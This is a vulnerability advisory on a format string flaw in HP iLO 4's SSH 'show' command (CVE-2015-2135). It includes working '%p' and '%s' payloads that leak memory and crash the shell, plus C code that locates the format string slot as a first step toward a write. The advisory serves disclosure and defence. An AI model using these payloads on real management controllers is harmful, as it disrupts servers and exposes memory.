SSD Advisory – HP iLO Format String

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
HP Proliant Servers provide an embedded operating system running on a separate CPU called iLO (Integrated Lights Out). It provides various networking and management features for the server.
Vulnerability Details
HP iLO runs an SSH server by default, and users who log in are dropped into a restricted, purpose-built shell. The “show” command contains a format string vulnerability that allows a low-privileged user account to cause a denial of service of the service or potentially execute arbitrary code.
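To make the bug class concrete, here is an added C model of the kind of handler described above (example code written for this page, not iLO firmware, whose source is not public): a “show” routine that hands a stored property value straight to a printf-style formatter, next to the fixed version. The property struct, the cli_printf wrapper and the function names are assumptions; only the property name comes from the advisory.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define VALUE_MAX 64

/* One configurable iLO property (property name from the advisory; the struct
 * layout is an assumption made for this example). */
struct property {
    char name[32];
    char value[VALUE_MAX];
};

/* printf-style helper of the kind an embedded CLI would have; the vulnerable
 * handler below reaches vsnprintf through it with a non-literal format. */
static int cli_printf(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
    return n;
}

/* Store a user-supplied value ("set"); 0 on success, -1 if it does not fit. */
int property_set(struct property *p, const char *name, const char *value)
{
    if (strlen(name) >= sizeof p->name || strlen(value) >= sizeof p->value)
        return -1;
    strcpy(p->name, name);
    strcpy(p->value, value);
    return 0;
}

/* VULNERABLE "show": the attacker-controlled value is the format string, so
 * "%p %p %p %p" walks the stack and "%s%s%s%s" dereferences whatever is there.
 * Returns the formatter's result, or -1 if the "name=" prefix is truncated. */
int property_show_vulnerable(const struct property *p, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s=", p->name);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return cli_printf(out + n, outlen - (size_t)n, p->value);   /* the bug */
}

/* FIXED "show": fixed format string, the value is only ever an argument. */
int property_show_safe(const struct property *p, char *out, size_t outlen)
{
    return cli_printf(out, outlen, "%s=%s", p->name, p->value);
}

/* Defence in depth for "set": no Kerberos realm legitimately contains '%'. */
int value_has_format_directive(const char *value)
{
    return strchr(value, '%') != NULL;
}

int main(void)
{
    struct property p;
    char out[128];

    /* "%%" is the only directive that is well-defined without arguments, so it
     * is used here to show the difference without invoking UB on the host. */
    property_set(&p, "oemhp_dir_kerberos_realm", "EXAMPLE.COM%%");
    property_show_vulnerable(&p, out, sizeof out);
    printf("vulnerable: %s\n", out);   /* the %% collapses to a single % */
    property_show_safe(&p, out, sizeof out);
    printf("safe:       %s\n", out);   /* value echoed verbatim */
    return 0;
}
```

Feeding the real “%p” or “%s” probes to property_show_vulnerable is undefined behaviour on the host, which is exactly the point; the “%%” case is enough to see the value being interpreted rather than copied. The check to run over a real code base: declare every printf-style wrapper such as cli_printf with __attribute__((format(printf, 3, 4))) and build with gcc -Wall -Wformat -Wformat-security, which reports the non-literal call in property_show_vulnerable at compile time.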

Analysis
Users and administrators of the server can log in and are dropped into an isolated “hpiLO” shell. This shell is not a bash or sh environment but an isolated CLI that exposes a fixed set of commands and verbs for performing operations.
[hp_ilo_image_1: screenshot of the hpiLO shell]
A user with “config” privileges has the right to modify a set of configuration variables for the server. This privilege, which iLO considers minimal (as seen below), is all that is needed to reach the bug.
[hp_ilo_image_2: screenshot of the iLO user privilege settings]
Selecting additional privileges for the user account above upgrades its privilege level to “operator” or “administrator”. But a plain “user” with only “Configure iLO Settings” enabled is already able to modify a variable that can afterwards be displayed with “show”, which is enough to trigger the format string.
Technical Details
Here’s a demonstration session logged in as user “test”. Output has been snipped for brevity.

</>hpiLO-> show -a /map1/accounts1
/map1/accounts1/Administrator
  Targets
  Properties
    username=Administrator
    password=********
    name=Administrator
    group=admin,config,oemhp_rc,oemhp_power,oemhp_vm
    sshkeyhash=<No SSH public key installed>
/map1/accounts1/test
  Targets
  Properties
    username=test
    password=********
    name=test
    group=config
    sshkeyhash=<No SSH public key installed>
</>hpiLO-> show /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm
/map1/oemhp_dircfg1
  Properties
    oemhp_dir_kerberos_realm=test
Format String Trigger (Impact: Memory Disclosure)
</>hpiLO-> set /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm="%p %p %p %p"
Directory settings modified.
</>hpiLO-> show /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm
/map1/oemhp_dircfg1
  Properties
    oemhp_dir_kerberos_realm=0 976e 0 25207025
Format String Trigger (Impact: Denial of Service)
</>hpiLO-> set /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm="%s%s%s%s"
Directory settings modified.
</>hpiLO-> show /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm
/map1/oemhp_dircfg1
  Properties
[... shell stops responding]

If we disconnect and log back in, the shell no longer responds to commands. Without root access to the machine it is hard to say which account the shell runs under, but we can infer that it runs as a single, likely higher-privileged (possibly root) account shared by all users: triggering the bug and crashing the shell as user “test” leaves the shell unresponsive for “administrator” as well. That is, disconnecting and logging back in after the DoS trigger yields an unresponsive shell for “test” and “administrator” alike.
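The values echoed in the memory-disclosure run above carry more than they appear to. 25207025 is the little-endian encoding of the bytes “%p %”, the start of the probe string itself, so the fourth %p slot is the user-controlled buffer sitting on the stack; and slots 1 and 3 are zero, so the first %s of the “%s%s%s%s” run dereferences a null pointer, which is consistent with the hang. The following added C program (written for this page, not part of the advisory) parses the echoed output and derives both facts; it assumes a 32-bit little-endian target, as the width of the leaked words suggests, and the function names are its own.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_WORDS 16

/* The probe sent with "set" and the value echoed back by "show" in the advisory. */
static const char PROBE[] = "%p %p %p %p";
static const char LEAKED[] = "0 976e 0 25207025";

/* Split the echoed text into 32-bit hex words (no 0x prefix, as in the output above).
 * Returns the number of words parsed. */
size_t parse_leak(const char *text, uint32_t *words, size_t max)
{
    char buf[256];
    size_t n = 0;
    if (strlen(text) >= sizeof buf)
        return 0;
    strcpy(buf, text);
    for (char *tok = strtok(buf, " "); tok != NULL && n < max; tok = strtok(NULL, " "))
        words[n++] = (uint32_t)strtoul(tok, NULL, 16);
    return n;
}

/* The first four bytes of a string viewed as a little-endian 32-bit word,
 * i.e. what a %p prints when it lands on the string itself. */
uint32_t first_word_le(const char *s)
{
    uint32_t w = 0;
    for (int i = 0; i < 4 && s[i] != '\0'; i++)
        w |= (uint32_t)(unsigned char)s[i] << (8 * i);
    return w;
}

/* 1-based %p slot whose value is the probe string itself, 0 if none matched.
 * That slot is the attacker-controlled buffer on the stack. */
int find_format_string_slot(const char *probe, const uint32_t *words, size_t n)
{
    uint32_t needle = first_word_le(probe);
    for (size_t i = 0; i < n; i++)
        if (words[i] == needle)
            return (int)i + 1;
    return 0;
}

/* Slots holding 0: a %s in that position dereferences NULL. Returns the count. */
size_t null_pointer_slots(const uint32_t *words, size_t n, int *slots, size_t max)
{
    size_t k = 0;
    for (size_t i = 0; i < n && k < max; i++)
        if (words[i] == 0)
            slots[k++] = (int)i + 1;
    return k;
}

int main(void)
{
    uint32_t words[MAX_WORDS];
    int nulls[MAX_WORDS];
    size_t n = parse_leak(LEAKED, words, MAX_WORDS);
    size_t k = null_pointer_slots(words, n, nulls, MAX_WORDS);

    printf("format string found in %%p slot %d\n", find_format_string_slot(PROBE, words, n));
    for (size_t i = 0; i < k; i++)
        printf("%%s slot %d would dereference NULL\n", nulls[i]);
    return 0;
}
```

Finding the slot that holds the format string is the first step of any further work on a bug like this, because it is the slot a “%n”-style write would be steered through; the advisory stops at disclosure and denial of service, and so does this example.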
Affected Versions
HP iLO version 4 firmware v2.0
HP iLO version 4 Advanced firmware v2.0
Vendor Response
The vendor was notified in July 2015 and has released a patch for this vulnerability, published as “HP Intelligent Provisioning, Remote Code Execution, Unauthorized Access”.
CVE
A single CVE entry has been assigned to this vulnerability, CVE-2015-2135.